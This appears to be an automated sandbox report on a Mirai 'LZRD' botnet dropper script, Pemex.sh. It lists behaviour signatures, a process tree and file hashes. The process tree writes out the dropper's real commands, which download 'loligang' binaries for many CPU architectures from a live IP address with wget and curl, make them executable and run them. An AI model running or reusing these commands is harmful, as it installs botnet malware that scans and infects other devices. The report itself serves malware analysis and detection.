Analysis

  • max time kernel
    123s
  • max time network
    152s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    23-12-2024 06:16

General

  • Target

    Pemex.sh

  • Size

    1KB

  • MD5

    e18ba04d72384ac85e6117c774f6d4f9

  • SHA1

    6cb8e9a2da2db042da0875a08f43cc867b8a2c5b

  • SHA256

    289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e

  • SHA512

    3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (85022) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 16 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 8 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads system network configuration 1 TTPs 8 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Pemex.sh
    /tmp/Pemex.sh
    1⤵
    • Writes file to tmp directory
    PID:703
    • /usr/bin/wget
      wget http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Writes file to tmp directory
      PID:706
    • /usr/bin/curl
      curl -O http://185.255.120.43/lmaoWTF/loligang.x86
      2⤵
      • Writes file to tmp directory
      PID:724
    • /bin/cat
      cat loligang.x86
      2⤵
        PID:733
      • /bin/chmod
        chmod +x awoo loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
        2⤵
        • File and Directory Permissions Modification
        PID:734
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        PID:735
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:737
      • /usr/bin/curl
        curl -O http://185.255.120.43/lmaoWTF/loligang.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:738
      • /bin/cat
        cat loligang.mips
        2⤵
        • System Network Configuration Discovery
        PID:739
      • /bin/chmod
        chmod +x awoo loligang.mips loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
        2⤵
        • File and Directory Permissions Modification
        PID:740
      • /tmp/awoo
        ./awoo
        2⤵
        • Executes dropped EXE
        PID:741
      • /usr/bin/wget
        wget http://185.255.120.43/lmaoWTF/loligang.mpsl
        2⤵
        • Writes file to tmp directory
        PID:743
      • /usr/bin/curl
        curl -O http://185.255.120.43/lmaoWTF/loligang.mpsl
        2⤵
        • Writes file to tmp directory
        PID:746
      • /bin/cat
        cat loligang.mpsl
        2⤵
          PID:767
        • /bin/chmod
          chmod +x awoo loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
          2⤵
          • File and Directory Permissions Modification
          PID:768
        • /tmp/awoo
          ./awoo
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:769
        • /usr/bin/wget
          wget http://185.255.120.43/lmaoWTF/loligang.arm4
          2⤵
            PID:774
          • /usr/bin/curl
            curl -O http://185.255.120.43/lmaoWTF/loligang.arm4
            2⤵
            • Writes file to tmp directory
            PID:785
          • /bin/chmod
            chmod +x awoo loligang.arm4 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
            2⤵
            • File and Directory Permissions Modification
            PID:802
          • /tmp/awoo
            ./awoo
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Reads system network configuration
            • Reads runtime system information
            PID:803
          • /usr/bin/wget
            wget http://185.255.120.43/lmaoWTF/loligang.arm5
            2⤵
            • Writes file to tmp directory
            PID:807
          • /usr/bin/curl
            curl -O http://185.255.120.43/lmaoWTF/loligang.arm5
            2⤵
            • Writes file to tmp directory
            PID:816
          • /bin/chmod
            chmod +x awoo loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
            2⤵
            • File and Directory Permissions Modification
            PID:818
          • /tmp/awoo
            ./awoo
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Reads system network configuration
            • Reads runtime system information
            PID:819
          • /usr/bin/wget
            wget http://185.255.120.43/lmaoWTF/loligang.arm6
            2⤵
            • Writes file to tmp directory
            PID:823
          • /usr/bin/curl
            curl -O http://185.255.120.43/lmaoWTF/loligang.arm6
            2⤵
            • Writes file to tmp directory
            PID:827
          • /bin/chmod
            chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f59
            2⤵
            • File and Directory Permissions Modification
            PID:829
          • /tmp/awoo
            ./awoo
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Reads system network configuration
            • Reads runtime system information
            PID:830
          • /usr/bin/wget
            wget http://185.255.120.43/lmaoWTF/loligang.arm7
            2⤵
            • Writes file to tmp directory
            PID:835
          • /usr/bin/curl
            curl -O http://185.255.120.43/lmaoWTF/loligang.arm7
            2⤵
            • Writes file to tmp directory
            PID:851
          • /bin/chmod
            chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 Pemex.sh
            2⤵
            • File and Directory Permissions Modification
            PID:870
          • /tmp/awoo
            ./awoo
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Reads system network configuration
            • Reads runtime system information
            PID:871
          • /usr/bin/wget
            wget http://185.255.120.43/lmaoWTF/loligang.ppc
            2⤵
            • Writes file to tmp directory
            PID:876
          • /usr/bin/curl
            curl -O http://185.255.120.43/lmaoWTF/loligang.ppc
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:882
          • /bin/chmod
            chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh
            2⤵
            • File and Directory Permissions Modification
            PID:884
          • /tmp/awoo
            ./awoo
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Reads system network configuration
            • Reads runtime system information
            PID:885
          • /usr/bin/wget
            wget http://185.255.120.43/lmaoWTF/loligang.m68k
            2⤵
            • Writes file to tmp directory
            PID:889
          • /usr/bin/curl
            curl -O http://185.255.120.43/lmaoWTF/loligang.m68k
            2⤵
            • Writes file to tmp directory
            PID:893
          • /bin/chmod
            chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh
            2⤵
            • File and Directory Permissions Modification
            PID:898
          • /tmp/awoo
            ./awoo
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Reads system network configuration
            • Reads runtime system information
            PID:899
          • /usr/bin/wget
            wget http://185.255.120.43/lmaoWTF/loligang.sh4
            2⤵
            • Writes file to tmp directory
            PID:906
          • /usr/bin/curl
            curl -O http://185.255.120.43/lmaoWTF/loligang.sh4
            2⤵
            • Writes file to tmp directory
            PID:907
          • /bin/chmod
            chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.sh4 loligang.x86 Pemex.sh
            2⤵
            • File and Directory Permissions Modification
            PID:909
          • /tmp/awoo
            ./awoo
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Reads system network configuration
            • Reads runtime system information
            PID:910

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/awoo

          Filesize

          87KB

          MD5

          5f6d2539a443501c888fc90986479ee6

          SHA1

          1f1ce02f9cafc0e684559cd7e36170d6cba370dc

          SHA256

          5775d9b48bb5c73f8e4625ee86f07e33967aecca610947654e8eea692e200137

          SHA512

          3bd781322c46687a8d750c1129b843a2a2312b186094d5918d5d8eac8c0b04ef8ee14a6a14fb74eb557bdb6558f78301a597ee651c4ace2aa23ebe02554a7198

        • /tmp/awoo

          Filesize

          89KB

          MD5

          9a397c973a66d7380ca64d61070b88d3

          SHA1

          f6828d001883357d22adf948b087ca400c5498dc

          SHA256

          67b7d4c356522d870024d4f04289dc6bcc53537209478fe43347511abb7e63fc

          SHA512

          18c4d902787043acdc63b3640f6e405dc8f96be38fbd40664595b1c6224adddcfc7895a20417a0de140c8280dc117f3dc7e9bcbb9336b8f0eabfb9f44d7adb77

        • /tmp/loligang.x86

          Filesize

          64KB

          MD5

          2354f2531c0bf296738fa7733c42785f

          SHA1

          86508e4ee74c70bf226f6666bf227a12be69dcad

          SHA256

          3d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93

          SHA512

          eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679